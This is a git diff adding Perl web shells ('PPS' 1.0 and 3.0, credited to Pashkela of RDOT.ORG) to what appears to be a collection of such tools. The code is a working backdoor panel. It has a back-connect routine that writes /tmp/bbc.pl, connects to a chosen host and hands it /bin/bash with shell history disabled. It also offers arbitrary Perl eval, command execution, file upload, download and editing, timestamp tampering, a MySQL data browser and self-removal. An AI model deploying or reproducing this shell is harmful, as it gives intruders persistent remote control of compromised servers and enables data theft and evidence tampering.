+use IO::Socket;$system	= "/bin/bash";use Socket;use FileHandle;socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname("tcp")) or die print "[-] Unable to Resolve Host\n";connect(SOCKET, sockaddr_in("'.$port.'", inet_aton("'.$target.'"))) or die print "[-] Unable to Connect Host\n";SOCKET->autoflush();open(STDIN, ">&SOCKET");open(STDOUT,">&SOCKET");open(STDERR,">&SOCKET");system("unset HISTFILE; unset SAVEHIST ;echo PPS 1.0 backconnect:;pwd;");system($system);';print FILE $bbc;close(FILE);system("chmod 777 /tmp/bbc.pl;perl /tmp/bbc.pl $target $port");exit;}
+sub NetGo{&PrintPageHeader("c");$target =  $in{'server'};$port =  $in{'ppport'};NetForm();back();&PrintPageFooter;}
+sub EvalCodePrint{&PrintPageHeader("p");EvalCodeForm();&PrintPageFooter;}
+sub EvalCodeForm{
+print <<END;
+<h1>Execution PERL-code</h1><form name=pf method=post action=$ScriptLocation><textarea name=code class=bigarea id=PerlCode></textarea><input type="hidden" name="a" value="eval_code"><input type=submit value=Eval style="margin-top:5px">
+END
+}
+sub EvalCode{&PrintPageHeader("c");EvalCodeForm();$ccode =  $in{'code'};print "<br>Result:<br>";eval $ccode;&PrintPageFooter;}
+sub EditFilePathForm {
+print <<END;
+<code><br><form name=pfsd method=post action=$ScriptLocation>$Prompt<input type="text" name=path id=edit1_file><input type="hidden" name="a" value="edit_file_path"><input type="hidden" name="d" value="$CurrentDir"><input type=submit value=MakeDir></form></code>
+END
+}
+sub EditFilePath{$fpath = $in{'d'} . "/". $in{'path'};EditFilePrint();}
+sub EditFilePrint{&PrintPageHeader("p");EditFileForm();&PrintPageFooter;}
+sub EditFileForm{open(FILE, $fpath);@file = <FILE>;$fccodde = HtmlSpecialChars(join('', @file));
+print <<END;
+<h1>Edit File: $fpath</h1><form name=pf11 method=post action=$ScriptLocation><textarea name=ccode class=bigarea id=editfile>$fccodde</textarea><input type="hidden" name="a" value="edit_file"><input type=hidden name=path value=$fpath><input type="hidden" name="d" value="$CurrentDir"><input type=submit value=Save style="margin-top:5px"></form>
+END
+}
+sub ViewFile{$fpath = $CurrentDir."/".$ViewF;&PrintPageHeader("c");open(FILE, $fpath);@file = <FILE>;$fccodde = join('', @file); 
+$fccodde = HtmlSpecialChars($fccodde);
+print <<END;
+<h1>View File: $fpath</h1><span>htmlspecialchars:</span><br><textarea name=view class=bigarea>$fccodde</textarea></form>
+END
+&PrintPageFooter;
+}
+sub EditFile {&PrintPageHeader("c");$fccode = $in{'ccode'};$ffpath = $in{'path'};
+print <<END;
+<h1>Edit File: $ffpath</h1><form name=pf11 method=post action=$ScriptLocation><textarea name=ccode class=bigarea id=editfile>$fccode</textarea><input type="hidden" name="a" value="edit_file"><niput type=hidden name=path value=$ffpath><input type="hidden" name="d" value="$CurrentDir"><input type=submit value=Save style="margin-top:5px"></form>
+END
+open(FFF,"> $ffpath");print FFF DeHtmlSpecialChars($fccode);close(FFF);print "File $ffpath saved";&PrintPageFooter;}
+sub sql_columns{&GetCookies;$hhost=$Cookies{'hhost'};$pport=$Cookies{'pport'};$usser=$Cookies{'usser'};$passs=$Cookies{'passs'};
+$dbb=$Cookies{'dbb'};$table=$Cookies{'table'};&PrintPageHeader("c");sql_vars_set();sql_loginform();$column=$in{'column'};
+print <<END;
+<SCRIPT LANGUAGE="JavaScript">function setCookie (name, value, expires, path, domain, secure){document.cookie=name+"="+escape(value)+((expires) ? "; expires=" + expires : "")+((path) ? "; path=" + path : "")+((domain) ? "; domain=" + domain : "")+  ((secure) ? "; secure" : "");}setCookie("column", "$column", "", "/");</SCRIPT>
+END
+print "<table width=100%>";print '<font face="Verdana" size="1">';$dbh = DBI->connect("DBI:mysql:$dbb:$hhost:$pport",$usser,$passs);$sth = $dbh->prepare("SHOW DATABASES");$sth->execute;print "<b>DATABASES:</b><br>";print "<td><table border=1 cellspacing=0 cellpadding=1>";while ($ref = $sth->fetchrow_arrayref){$s4et++;sql_databases_form();}$rc=$sth->finish;print "</table></td><td><table width=100%>";sql_query_form();print "</table></td></table>";$s4et = 0;$sth = $dbh->prepare("SHOW TABLES FROM $dbb");$sth->execute;print "</table>";print "<b>Tables from $dbb:</b><br>";print "<table border=1 cellspacing=0 cellpadding=1 cols=4>";print "<td><table border=1 cellspacing=0 cellpadding=1 cols=2>";while ($ref = $sth->fetchrow_arrayref){
+$s4et++;sql_tables_form();}$rc=$sth->finish;print "</table></td><td><table border=1 cellspacing=0 cellpadding=1 cols=2>";$s4et=0; 
+$sth = $dbh->prepare("show columns from $table from $dbb");$sth->execute;while ($ref = $sth->fetchrow_arrayref){$s4et++; sql_columns_form();}$rc=$sth->finish;print "</table></td>";$s4et = 0;$zapros = "SELECT $column FROM `".$dbb."`.`".$table."` LIMIT 0,30";print '<script>document.querys.query.value="'.$zapros.'";</script>';$sth = $dbh->prepare($zapros);$sth->execute;print "<td><table border=1 cellspacing=0 cellpadding=1 cols=2>";while ($ref = $sth->fetchrow_arrayref){$s4et++;sql_data_form();}$rc = $sth->finish;$rc=$dbh->disconnect;print "</table></td></table>";&PrintPageFooter;}sub sql_tables{&GetCookies;$hhost=$Cookies{'hhost'};$pport=$Cookies{'pport'};$usser=$Cookies{'usser'};$passs=$Cookies{'passs'};$dbb=$Cookies{'dbb'};&PrintPageHeader("c");
+sql_vars_set();sql_loginform();$qqquery =  $in{'table'};
+print <<END;
+<SCRIPT LANGUAGE="JavaScript">function setCookie (name,value,expires,path,domain,secure){document.cookie=name+"="+escape(value)+((expires) ? ";expires="+expires:"")+((path) ? ";path="+path:"")+((domain) ? ";domain="+domain:"")+((secure) ? ";secure":"");}
+setCookie("table", "$qqquery", "", "/");</SCRIPT>
+END
+print "<table width=100%>";print '<font face="Verdana" size="1">';$dbh = DBI->connect("DBI:mysql:$dbb:$hhost:$pport",$usser,$passs);$sth=$dbh->prepare("SHOW DATABASES");$sth->execute;print "<b>DATABASES:</b><br>";print "<td><table border=1 cellspacing=0 cellpadding=1>";while ($ref=$sth->fetchrow_arrayref){$s4et++;sql_databases_form();}$rc=$sth->finish;print "</table></td><td><table width=100%><td>";sql_cq_form();print "</td><td>";sql_query_form();print "</td></table></td></table>";$s4et=0;$sth=$dbh->prepare("SHOW TABLES FROM $dbb");$sth->execute;print "<b>Tables from $dbb:</b><br>";print "<table border=1 cellspacing=0 cellpadding=1 cols=4>";print "<td><table border=1 cellspacing=0 cellpadding=1 cols=2>";while ($ref = $sth->fetchrow_arrayref){$s4et++;sql_tables_form();}$rc=$sth->finish;print "</table></td><td><table border=1 cellspacing=0 cellpadding=1 cols=2>";$s4et=0;$zapros = "SHOW COLUMNS FROM `$qqquery` FROM `$dbb`";print '<script>document.querys.query.value="'.$zapros.'";</script>';$sth=$dbh->prepare($zapros);$sth->execute;while ($ref = $sth->fetchrow_arrayref){$s4et++;sql_columns_form();}$rc=$sth->finish;$rc=$dbh->disconnect;print "</table></td></table>";&PrintPageFooter;}
+sub sql_databases{sql_vars_set();&PrintPageHeader("c");sql_vars_set();sql_loginform();$ddb = $in{'database'};
+print <<END;
+<SCRIPT LANGUAGE="JavaScript">function setCookie (name,value,expires,path,domain,secure){document.cookie = name+"="+escape(value) +((expires) ? ";expires="+expires:"")+((path) ? "; path="+path:"")+((domain) ? ";domain="+domain:"")+((secure) ? ";secure":"");}setCookie("dbb","$ddb","","/");</SCRIPT>
+END
+print "<table width=100%>";print '<font face="Verdana" size="1">';$dbh = DBI->connect("DBI:mysql:$dbb:$hhost:$pport",$usser,$passs);$sth = $dbh->prepare("SHOW DATABASES");$sth->execute;print "<b>DATABASES:</b><br>";print "<td><table border=1 cellspacing=0 cellpadding=1>";while ($ref=$sth->fetchrow_arrayref){$s4et++;sql_databases_form();}$rc=$sth->finish;print "</table></td><td><table width=100%>";sql_query_form();print "</table></td></table>";$s4et=0;$zapros = "SHOW TABLES FROM `$ddb`";print '<script>document.querys.query.value="'.$zapros.'";</script>';$sth=$dbh->prepare($zapros);$sth->execute;print "</table>";print "<b>Tables from $ddb:</b><br>";print " <table border=1 cellspacing=0 cellpadding=1 cols=10>";while ($ref=$sth->fetchrow_arrayref){$s4et++;sql_tables_form();}$s4et=0;$rc=$sth->finish;$rc=$dbh->disconnect;print "</table>";&PrintPageFooter;}
+sub sql_set_cookie{print "Set-Cookie: hhost=$hhost;\n";print "Set-Cookie: pport=$pport;\n";print "Set-Cookie: usser=$usser;\n";print "Set-Cookie: passs=$passs;\n";print "Set-Cookie: dbb=$dbb;\n";}
+sub sql_query{sql_vars_set();&GetCookies;$hhost=$Cookies{'hhost'};$pport=$Cookies{'pport'};$usser=$Cookies{'usser'};$passs=$Cookies{'passs'};$dbb=$Cookies{'dbb'};$table=$Cookies{'table'};&PrintPageHeader("c");sql_vars_set();sql_loginform();$qquery=$in{'cquery'};if ($qquery){$qquery="SELECT CONCAT_WS(0x3a,$qquery) FROM `$dbb`.`$table` LIMIT 0,30";}else{$qquery = $in{'query'};}$dbh = DBI->connect("DBI:mysql:$dbb:$hhost:$pport",$usser,$passs);$sth=$dbh->prepare("SHOW DATABASES");$sth->execute;print '<font face="Verdana" size="1">';print "<table width=100% cellspacing=0 cellpadding=1 cols=2>";print "<b>DATABASES:</b>";print "<td><table border=1 cellspacing=0 cellpadding=1>";while ($ref=$sth->fetchrow_arrayref){$s4et++;sql_databases_form();}$rc=$sth->finish;print "</table></td><td><table width=100%>";sql_query_form();print "</table></td></table>";$s4et=0;$sth = $dbh->prepare($qquery);$sth->execute;print "<b>Results:</b><br>";print " <table border=1 cellspacing=0 cellpadding=1 cols=10>";while ($ref=$sth->fetchrow_arrayref){$s4et++;print "<tr><td><font face=Verdana size=1>[$s4et]</font></td><td><font face=Verdana size=1>$$ref[0]</font></td></tr>";}$s4et=0;$rc=$sth->finish;$rc=$dbh->disconnect;print "</table>";print '<script>document.querys.query.value="'.$qquery.'";</script>';&PrintPageFooter;}
+sub sql_connect{sql_vars_set();sql_set_cookie();&PrintPageHeader("c");sql_loginform();sql_vars_set();$s4et=0;$dbb="";$dbh=DBI->connect("DBI:mysql:$dbb:$hhost:$pport",$usser,$passs);if($hhost && $pport && $usser && $passs){$zapros = "SHOW DATABASES";print '<script>document.querys.query.value="'.$zapros.'";</script>';$sth = $dbh->prepare($zapros);$sth->execute;print '<font face="Verdana" size="1">';print "<table width=100%>";print "<b>DATABASES:</b>";print "<td><table border=1 cellspacing=0 cellpadding=1>";while($ref=$sth->fetchrow_arrayref){$s4et++;sql_databases_form();}$rc=$sth->finish;print "</table></td><td>";   sql_query_form();print "</td></table>";$rc = $dbh->disconnect;print '</font>';return;}print "Some error...";print '</font>';&PrintPageFooter;}
+sub UploadFile{if($TransferFile eq ""){&PrintPageHeader("f");file_header();&PrintCommandLineInputForm;&PrintFileUploadForm;&PrintPageFooter;return;}&PrintPageHeader("c");file_header();print "<font size=1>Uploading $TransferFile to $CurrentDir...<br>";chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/;$TransferFile =~ m!([^/^\\]*)$!;$TargetName .= $PathSep.$1;$TargetFileSize = length($in{'filedata'});if(open(UPLOADFILE, ">$TargetName")){binmode(UPLOADFILE) if $WinNT;print UPLOADFILE $in{'filedata'};close(UPLOADFILE);print "Transfered $TargetFileSize Bytes.<br>";print "File Path: $TargetName<br>";}else{print "Failed: $!<br>";}print "</font>";&PrintCommandLineInputForm;&PrintPageFooter;}
+sub DownloadFile{if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |	(!$WinNT & ($TransferFile =~ m/^\//))){$TargetFile=$TransferFile;
+}else{chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;$TargetFile .= $PathSep.$TransferFile;}if($Options eq "go"){
+&SendFileToBrowser($TargetFile);}else{&PrintDownloadLinkPage($TargetFile);}}
+sub Remove{use Cwd qw(abs_path);my $path = abs_path($0);system("rm $path");}
+&ReadParse;&GetCookies;$ScriptLocation=$ENV{'SCRIPT_NAME'};$ServerName=$ENV{'SERVER_NAME'};$LoginPassword=$in{'p'};$RunCommand=$in{'c'};$RunCommand1=$in{'aliases'};if($RunCommand1){$RunCommand=$RunCommand1}$ChangeDir=$in{'cc'};$ZipFile=$in{'zip'};$ZipArch=$in{'arh_name'};$UnZipArch=$in{'unzip_name'};$DelFile=$in{'del_file'};$DelDir=$in{'del_dir'};$MkDir=$in{'md'};$ViewF=$in{'path'};$Fchmod=$in{'fchmod'};$Fdata=$in{'fdata'};$MakeFile=$in{'mf'};$TransferFile=$in{'f'};$Options=$in{'o'};$Action=$in{'a'};$Action="filemanager" if($Action eq "");$CurrentDir=$in{'d'};chop($CurrentDir=`$CmdPwd`) if($CurrentDir eq "");$LoggedIn=$Cookies{'SAVEDPWD'} eq $Password;if($Action eq "login" || !$LoggedIn){&PerformLogin;}elsif($Action eq "command"){&ExecuteCommand;}elsif($Action eq "RT"){&RT;}elsif($Action eq "view_file"){&ViewFile;}elsif($Action eq "command1"){&ExecuteCommand1;}elsif($Action eq "filemanager"){&FileManager;}elsif($Action eq "console"){&Console;}elsif($Action eq "upload"){&UploadFile;}elsif($Action eq "download"){&DownloadFile;}elsif($Action eq "systeminfo"){&SystemInfo;}elsif($Action eq "code"){&EvalCodePrint;}elsif($Action eq "eval_code"){&EvalCode;}elsif($Action eq "net"){&NetPrint;}elsif($Action eq "net_go"){&NetGo;}elsif($Action eq "sql"){&sql;}elsif($Action eq "sql_connect"){&sql_connect;}elsif($Action eq "sql_query"){&sql_query;}elsif($Action eq "remove"){&Remove;}elsif($Action eq "edit_file"){&EditFile;}elsif($Action eq "edit_file_path"){&EditFilePath;}elsif($Action eq "sql_databases"){&sql_databases;}elsif($Action eq "sql_tables"){&sql_tables;}elsif($Action eq "sql_columns"){&sql_columns;}elsif($Action eq "logout"){&PerformLogout;}
diff --git a/pl/pps-pl/pps-v3.0.pl b/pl/pps-pl/pps-v3.0.pl
new file mode 100644
index 00000000..49bd40ab
--- /dev/null
+++ b/pl/pps-pl/pps-v3.0.pl
@@ -0,0 +1,78 @@
+#!/usr/bin/perl
+#PPS 3.0 shell by Pashkela [RDOT.ORG] © 2012
+#Developer By Mr.AaMa [ehcommunity.com] © 2012
+$Password="63a9f0ea7bb98050796b649e85481845";# root
+$CommandTimeoutDuration=30;# max time of command execution
+$tab='<table>';$tabe='</table>';$div='<div class=content><pre class=ml1>';$dive='</pre></div>';use Digest::MD5 qw(md5_hex);$WinNT=0;$NTCmdSep="&";$UnixCmdSep=";";$ShowDynamicOutput=1;$CmdSep=($WinNT?$NTCmdSep:$UnixCmdSep);$CmdPwd=($WinNT?"cd":"pwd");$PathSep=($WinNT?"\\":"/");$Redirector=($WinNT?" 2>&1 1>&2":" 1>&1 2>&1");$LogFlag=false;use File::Basename;use MIME::Base64;my @last:shared;sub cod($){my $url=~s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;$url=encode_base64($_[0]);return $url;}sub dec($){ my $url1=decode_base64($_[0]);return $url1;}sub ReadParse {local (*in)=@_ if @_;local($i,$loc,$key,$val);$MultipartFormData=$ENV{'CONTENT_TYPE'}=~/multipart\/form-data; boundary=(.+)$/;if($ENV{'REQUEST_METHOD'} eq "GET"){$in=$ENV{'QUERY_STRING'};}elsif($ENV{'REQUEST_METHOD'} eq "POST"){binmode(STDIN) if $MultipartFormData & $WinNT;read(STDIN,$in,$ENV{'CONTENT_LENGTH'});}if($ENV{'CONTENT_TYPE'}=~/multipart\/form-data; boundary=(.+)$/){$Boundary='--'.$1;@list=split(/$Boundary/,$in);$HeaderBody=$list[1];$HeaderBody=~/\r\n\r\n|\n\n/;$Header=$`;$Body=$';$Body=~s/\r\n$//;$in{'filedata'}=$Body;$Header=~/filename=\"(.+)\"/;$in{'f'}=$1;for($i=2;$list[$i];$i++){$list[$i]=~s/^.+name=$//;$list[$i]=~/\"(\w+)\"/;$key=$1;$val=$';$val=~s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;$val=~s/%(..)/pack("c",hex($1))/ge;$in{$key}=$val;}}else{@in=split(/&/,$in);foreach $i(0 .. $#in){$in[$i]=~s/\+/ /g;($key,$val)=split(/=/,$in[$i],2);$key=~s/%(..)/pack("c",hex($1))/ge;$val=~s/%(..)/pack("c",hex($1))/ge;$in{$key}.="\0" if(defined($in{$key}));$in{$key}.=$val;}}}sub uname{$s="uname -a";$s.=" -U $q{u}" if($q{u});return $s;}sub hddall{$s='df -k /|sed 1d|awk "{total += \$2} {print total/1024/1024}"';$s.=" -U $q{u}" if($q{u});return $s;}sub hddfree{$s='df -k /|sed 1d|awk "{total += \$4} {print total/1024/1024}"';$s.=" -U $q{u}" if($q{u});return $s;}sub hddproc{$s='df -k /| sed 1d | awk "{total += \$5} {print 100-total}"';$s.=" -U $q{u}" if($q{u});return $s;}$hddall=hddall();$hddfree=hddfree();$hddproc=hddproc();sub PH{printf ("%.2f",(@_))};sub id{$s="id";$s.=" -U $q{u}" if($q{u});return $s;}sub dir_read($){if(!-r $_[0]||$_[0]=~m/\"/gis||$_[0]=~m/\s/gis||$_[0]=~m/\(/gis||$_[0]=~m/\)/gis){return "# Can't read $_[0]!";}else{$_[0]=~s/\/\//\//g;return "cd ".$_[0];}}sub dlink($){if(-l $_[0]){return '->'.readlink $_[0]}}sub dir_list{my @list=();$CurrentDir=~s!\Q//!/!g;my $dir=$CurrentDir;@list=scan_dir($dir);$id=0;foreach $arg(@list){$id++;$ii='d'.$id;my $name=fileparse($arg,@suffixlist);if (-d $arg){print '<tr class='.($id%2==0?"l1":"l2").'><th class=chkbx><input type=checkbox class=chkbx name=lo></th><td><form method=POST name='.$ii.'><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value="'.dir_read($arg).'"><a href="javascript:document.'.$ii.'.submit()"><font face="Verdana" size="2">&nbsp;<b>[ '.$name.dlink($arg).' ]</b></font></a></form></td><td>dir</td><td>'.mt1((stat($arg))[9]).'</td>'.owner($arg).'<td>'.$tab.'<td><form name='.$ii.'rt method="POST"><input type="hidden" name="d" value="'.$CurrentDir.'"><input type="hidden" name="a" value="RT"><input type="hidden" name="fdata" value='.cod(mt1((stat($arg))[9])).'><input type="hidden" name="fchmod" value='.perm($arg).'><input type="hidden" name="f" value='.$name.'><a href="javascript:document.'.$ii.'rt.submit()">R T </a></form></td><td><form method=POST name='.$ii.'z><input type=hidden name=zip value='.$name.'><input type=hidden name=arh_name value='.$ii.'z><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value=zip><a href="javascript:document.'.$ii.'z.submit()">[zip]</a></form></td><td><form method=POST name='.$ii.'uz><input type=hidden name=unzip_name value='.$name.'><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value=unzip><a href="javascript:document.'.$ii.'uz.submit()">[unzip]</a></form></td><td><form method=POST name='.$ii.'del><input type=hidden name=del_dir value='.$name.'><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value=deldir><a href="javascript:document.'.$ii.'del.submit()">[<font color=#FF0000>x</font>]</a></form></td></table/></td></tr>';}else{$size1=(stat $arg)[7]/1024;if($size1<1000){$size=sprintf("%.2f",($size1))." KB";}else{$size=sprintf("%.2f",($size1/1024))." MB";}print '<tr class='.($id%2==0?"l1":"l2").'><th class=chkbx><input type=checkbox class=chkbx name=lo></th><td><form name='.$ii.' method=post><input type=hidden name=path id=view value='.$name.'><input type=hidden name=a value=view_file><input type=hidden name=d value='.$CurrentDir.'><a href="javascript:document.'.$ii.'.submit()"><font face="Verdana" size="2">&nbsp;'.$name.dlink($arg).'</font></a></form></td><td>'.$size.'</td><td>'.mt1((stat($arg))[9]).'</td>'.owner($arg).'<td>'.$tab.'<td><form name='.$ii.'rt method="POST"><input type="hidden" name="d" value="'.$CurrentDir.'"><input type="hidden" name="a" value="RT"><input type="hidden" name="fdata" value='.cod(mt1((stat($arg))[9])).'><input type="hidden" name="fchmod" value='.perm($arg).'><input type="hidden" name="f" value='.$name.'><a href="javascript:document.'.$ii.'rt.submit()">R T </a></form></td><td><form name='.$ii.'ed method=post><input type=hidden name=path id=edit1_file value='.$name.'><input type=hidden name=a value=edit_file_path><input type=hidden name=d value='.$CurrentDir.'><a href="javascript:document.'.$ii.'ed.submit()">E </a></form></td><td><form name='.$ii.'d method="POST"><input type="hidden" name="d" value="'.$CurrentDir.'"><input type="hidden" name="a" value="download"><input type="hidden" name="f" value='.$name.'><a href="javascript:document.'.$ii.'d.submit()">D </a></form></td><td><form method=POST name='.$ii.'z><input type=hidden name=zip value='.$name.'><input type=hidden name=arh_name value='.$ii.'z><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value=zip><a href="javascript:document.'.$ii.'z.submit()">[zip]</a></form></td><td><form method=POST name='.$ii.'uz><input type=hidden name=unzip_name value='.$name.'><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value=unzip><a href="javascript:document.'.$ii.'uz.submit()">[unzip]</a></form></td><td><form method=POST name='.$ii.'del><input type=hidden name=del_file value='.$name.'><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value=delfile><a href="javascript:document.'.$ii.'del.submit()">[<font color=#FF0000>x</font>]</a></form></td>'.$tabe.'</td></tr>'}}print $tabe;sub perm($){my $mode=sprintf("%04o",((stat($_[0]))[2])&07777);return $mode;}sub owner($){my $uid=(stat $_[0])[4];my $user=(getpwuid $uid)[0];my $uid1=(stat $_[0])[5];my $group=(getgrgid $uid1)[0];my $mode=sprintf("%04o",((stat($_[0]))[2])&07777);my $suid=substr $mode,0,1;my $last=substr $mode,1;if($suid==4||$suid==6||$suid==2){if(!-r $_[0]){return '<td>'.$user.'/'.$group.'</td><td><b><font color=#FFD700>'.$suid.'</font></b><font color=#FF0000>'.$last.'</font></td>';}elsif(!-w $_[0]){return '<td>'.$user.'/'.$group.'</td><td><b><font color=#FFD700>'.$suid.'</font></b><font color=#FFFFFF>'.$last.'</font></td>';}else{return '<td>'.$user.'/'.$group.'</td><td><b><font color=#FFD700>'.$suid.'</font></b><font color=#25ff00>'.$last.'</font></td>';}}else{if (!-r $_[0]){return '<td>'.$user.'/'.$group.'</td><td><font color=#FF0000>'.$mode.'</font></td>';}elsif(!-w $_[0]){return '<td>'.$user.'/'.$group.'</td><td><font color=#FFFFFF>'.$mode.'</font></td>';}else{return '<td>'.$user.'/'.$group.'</td><td><font color=#25ff00>'.$mode.'</font></td>';}}}sub mt{my($seconds,$minutes,$hours,$day,$month,$year,$wday,$yday,$isdst)=localtime();my $mmtime=($year+1900).'-'.sprintf("%02d",($month+1)).'-'.sprintf("%02d",$day).' '.sprintf("%02d",$hours).':'.sprintf("%02d",$minutes).':'.sprintf("%02d",$seconds);return $mmtime;}sub mt1($){my($seconds,$minutes,$hours,$day,$month,$year,$wday,$yday,$isdst)=localtime($_[0]);my $mmtime=($year+1900).'-'.sprintf("%02d",($month+1)).'-'.sprintf("%02d",$day).' '.sprintf("%02d",$hours).':'.sprintf("%02d",$minutes).':'.sprintf("%02d",$seconds);return $mmtime;}sub scan_dir{my ($dir)=@_;my @dirs=();my @files=();my @list=();my @file=();for $file (glob($dir.'/.*')){if (-d $file && $file ne $dir.'/.'){push @dirs,$file;}if (-f $file){push @files,$file;}}for $file (glob($dir.'/*')){if (-d $file) {push @dirs,$file;}else{push @files,$file;}}@list=(@dirs,@files);return @list;}}sub HtmlSpecialChars($){my ($st)=@_;$st=~s|<|< |g;$st=~s|>| >|g;return $st;}sub DeHtmlSpecialChars($){my ($st)=@_;$st=~s|< |<|g;$st=~s| >|>|g;return $st;}
+$uname = uname();$idd = id();sub P{print @_}sub PrintPageHeader{print "Content-type: text/html\n\n<body onLoad='changeText();changeText()'>";&GetCookies;$LoggedIn = $Cookies{'SAVEDPWD'} eq $Password;if ($LoggedIn != 1) {$Password = 0}$EncodedCurrentDir = $CurrentDir;$EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;print <<END;
+<html><head><title>PPS 3.0</title>$HtmlMetaHeader<style>body{background-color:#444;color:#e1e1e1;font: 9pt Monospace,'Courier New';text-decoration:none;}body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }table.info{ color:#fff;background-color:#222; }span,h1,a{ color: #df5 !important; }span{ font-weight: bolder; }h1{ border-left:5px solid #df5;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }div.content{ padding: 5px;margin-left:5px;background-color:#333;font: 9pt Monospace,'Courier New';}a{text-decoration:none;}a:hover{ text-decoration:underline;}.ml1{border:1px solid#444;font:9pt Monospace,'Courier New';color:#e1e1e1;padding:5px;margin:0;overflow:auto;}.bigarea{ width:100%;height:250px; }input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid #df5; font: 9pt Monospace,'Courier New'; }form{ margin:0px; }#toolsTbl{ text-align:center; }.toolsInp{ width: 300px}.toolsInp1{border: none}.main th{text-align:left;background-color:#5e5e5e;}.main tr:hover{background-color:#5e5e5e}.l1{background-color:#444}.l2{background-color:#333}pre{font-family:Courier,Monospace;}</style></head><body onLoad="document.checkbox.@_.focus()" bgcolor="#000000" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0"><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Hdd:<br>DateTime:<br>Pwd:</span></td><td><nobr>
+END
+P(`$uname`);print "</nobr><br>";P(`$idd`);print "<br>";PH(`$hddall`);print " GB <span>Free: </span>";PH(`$hddfree`);print " GB [ ";P(`$hddproc`);print "% ]";$time=mt();print "<br>$time$tab <td>";my $cwd="";my @path=split("/",$CurrentDir);my $mode=sprintf("%04o",((stat($CurrentDir))[2])&07777);my $ss=0;print '<table cellpadding=0 cellspacing=0><td><form method=POST name=cwd0><a href="javascript:document.cwd0.submit()">[..]&nbsp;</a><input type=hidden name=cc value="/"><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value="changedir"></form></td>';foreach my $ar(@path){if($ar){$cwd .= "/".$ar;$ss++;print '<td><form method=POST name=cwd'.$ss.'><a href="javascript:document.cwd'.$ss.'.submit()">/'.$ar.'</a><input type=hidden name=cc value='.$cwd.'><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value="changedir"></form></td>';}}my $fw="<font face=Verdana size=2 color=#FFFFFF>";my $fe="</font>";print $tabe;sub cwdcol{if (!-r $CurrentDir){return '<font color=#FF0000>'.$mode.'</font>';}elsif(!-w $CurrentDir){return '<font color=#FFFFFF>'.$mode.'</font>';}else{return '<font color=#25ff00>'.$mode.'</font>';}}print "<td>".cwdcol()."</td><td><a href=$ScriptLocation> [ home ] </a></td></td>$tabe";print <<END;
+</td><td width=1 align=right><nobr><span>Server IP:</span><br>$ENV{'SERVER_ADDR'}<br><span>Client IP:</span><br>$ENV{'REMOTE_ADDR'}</nobr></td></tr>$tabe<table width=100% bgcolor=#444><td><form method="POST" name=systeminfo><input type="hidden" name="a" value="systeminfo"><input type=hidden name=d value=$CurrentDir><a href="javascript:document.systeminfo.submit()">$fw [ $fe Sysinfo $fw ] $fe</a></form></td><td><form method=POST name=files><input type=hidden name=cc value=$CurrentDir><a href="javascript:document.files.submit()">$fw [ $fe Files $fw ] $fe</a><input type=hidden name=a value=command><input type=hidden name=d value=$CurrentDir><input type=hidden name=c value="cd $CurrentDir"></form></td><td><form method="POST" name=consoler><input type="hidden" name="a" value="console"><input type="hidden" name="d" value=$CurrentDir><a href="javascript:document.consoler.submit()"> $fw [ $fe Console $fw ] $fe</a></form></td><td><form method="POST" name=sqlman><input type=hidden name=d value=$CurrentDir><input type="hidden" name="a" value="sql"><a href="javascript:document.sqlman.submit()">$fw [ $fe SQL $fw ] $fe</a></form></td><td><form method="POST" name=backconn><input type=hidden name=d value=$CurrentDir><input type="hidden" name="a" value="net"><a href="javascript:document.backconn.submit()">$fw [ $fe Network $fw ] $fe</a></form></td><td><form method="POST" name=evalc><input type=hidden name=d value=$CurrentDir><input type="hidden" name="a" value="code"><a href="javascript:document.evalc.submit()">$fw [ $fe Code $fw ] $fe</a></form></td><td><form method="POST" name=logout><input type="hidden" name="a" value="logout"><a href="javascript:document.logout.submit()">$fw [ $fe Logout $fw ] $fe</a></form></td><td><form method="POST" name=remove><input type="hidden" name="a" value="remove"><a href="javascript:document.remove.submit()">$fw [ $fe Self remove $fw ] $fe</a></form></td>$tabe</tr>$tabe<font color="#C0C0C0" size="2">
+END
+}sub PrintLoginForm{print "<center><form name=f method=POST><input type=password name=p><input type=submit value='>>'></form></center>";}sub PrintPageFooter{print "</font></body></html>";}sub GetCookies{@httpcookies=split(/; /,$ENV{'HTTP_COOKIE'});foreach $cookie(@httpcookies){($id,$val)=split(/=/,$cookie);$Cookies{$id}=$val;}}sub PerformLogout{print "Set-Cookie: SAVEDPWD=;\n;Set-Cookie: last_command=;\n";print "Content-type: text/html\n\n";&PrintLoginForm;}sub PerformLogin{if(md5_hex($LoginPassword) eq $Password){print "Set-Cookie: SAVEDPWD=".md5_hex($LoginPassword).";\n";&PrintPageHeader("c");file_header();&PrintCommandLineInputForm;&PrintPageFooter;}else{print "Content-type: text/html\n\n";&PrintLoginForm;}}sub FileManager{&PrintPageHeader("f");file_header();&PrintCommandLineInputForm;&PrintPageFooter;}sub PrintCommandLineInputForm{$Prompt = $WinNT ? "$CurrentDir> " : "[$ServerName $CurrentDir]\$ ";dir_list();print "<tr><form method=post><input type=hidden name=a value=command><input type=hidden name=d value=$CurrentDir><select name=group><option value=delete>Delete</option><option 